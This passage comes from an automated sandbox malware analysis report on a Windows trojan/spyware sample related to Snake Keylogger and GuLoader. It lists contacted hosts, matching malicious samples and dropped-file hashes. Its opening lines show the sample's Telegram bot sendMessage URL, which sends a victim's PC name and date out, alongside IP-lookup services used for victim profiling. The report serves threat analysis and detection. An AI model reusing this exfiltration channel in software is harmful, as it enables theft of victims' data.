                                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20amsiexec.exe, 0000000B.00000002.3827428231.0000000025DE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 0000000B.00000002.3827428231.0000000025D4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    132.226.8.169
                                                                                                    checkip.dyndns.comUnited States
                                                                                                    16989UTMEMUSfalse
                                                                                                    142.250.186.129
                                                                                                    drive.usercontent.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    149.154.167.220
                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                    62041TELEGRAMRUfalse
                                                                                                    104.21.80.1
                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    216.58.206.46
                                                                                                    drive.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1587710
                                                                                                    Start date and time:2025-01-10 17:14:12 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 8m 35s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:15
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:r5yYt97sfB.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:88a5fa91e12be14e5e37a237da70392dd9218f29ad88fa2cff8693ab4e215e81.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/16@5/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 99%
                                                                                                    • Number of executed functions: 54
                                                                                                    • Number of non-executed functions: 26
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target msiexec.exe, PID 7864 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    11:15:17API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                    11:17:32API Interceptor1707999x Sleep call for process: msiexec.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    132.226.8.169b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • checkip.dyndns.org/
                                                                                                    149.154.167.220RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        reallyfreegeoip.orgRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.32.1
                                                                                                                        New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 104.21.64.1
                                                                                                                        api.telegram.orgRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        checkip.dyndns.comRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        TELEGRAMRURmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 149.154.167.99
                                                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 149.154.167.99
                                                                                                                        B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        CLOUDFLARENETUSRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 104.26.13.205
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        UTMEMUSMtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        1C24TDP_000000029.jseGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        jqxrkk.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        tx4pkcHL9o.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        New Order-090125.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        2V7usxd7Vc.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        ID_Badge_Policy.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        FSRHC6mB16.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        37f463bf4616ecd445d4a1937da06e19RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.186.129
                                                                                                                        • 216.58.206.46
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dllRmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              WYnv59N83j.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                t6V3uvyaAP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  WYnv59N83j.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    t6V3uvyaAP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      Unspuriousness.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                        Unspuriousness.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):53158
                                                                                                                                            Entropy (8bit):5.062687652912555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10785973
                                                                                                                                            Entropy (8bit):0.6364702292960722
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:mzVSlYOUMa3NTzdv1AroxQMZU03CmgqJLOQR:YMlYLMadTz/AroxlZXx
                                                                                                                                            MD5:23B1E13F420ED91FB2B5813640A26CFA
                                                                                                                                            SHA1:D78D705005D4B54D16C8C60740B9D8652CB73337
                                                                                                                                            SHA-256:4D18ABFAFDAA9E0A8476370F3F1E6148A7ACDE79986E172EABB74541E709F872
                                                                                                                                            SHA-512:9A31E517AAD363163E099E83FFF6588A5A66288CC3E2DB1CF2B9EE61F1A310F99F932C37FD39BBD5BA401E9ECA8C5336E39DA4E49FFC59053BDBCA92B3C29C60
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........,...................q... ........-..................................................................................................................................................................................................................................................G...R...............j...............................................................................................................................#...........6...,....)..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\r5yYt97sfB.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):6656
                                                                                                                                            Entropy (8bit):5.139253382998066
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:s7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN838:UbGgGPzxeX6D8ZyGgmkN
                                                                                                                                            MD5:1B0E41F60564CCCCCD71347D01A7C397
                                                                                                                                            SHA1:B1BDDD97765E9C249BA239E9C95AB32368098E02
                                                                                                                                            SHA-256:13EBC725F3F236E1914FE5288AD6413798AD99BEF38BFE9C8C898181238E8A10
                                                                                                                                            SHA-512:B6D7925CDFF358992B2682CF1485227204CE3868C981C47778DD6DA32057A595CAA933D8242C8D7090B0C54110D45FA8F935A1B4EEC1E318D89CC0E44B115785
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: RmIYOfX0yO.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Technonomic.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Azygoses125.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: WYnv59N83j.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: t6V3uvyaAP.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: WYnv59N83j.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: t6V3uvyaAP.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Unspuriousness.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Unspuriousness.exe, Detection: malicious, Browse
                                                                                                                                            • Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse
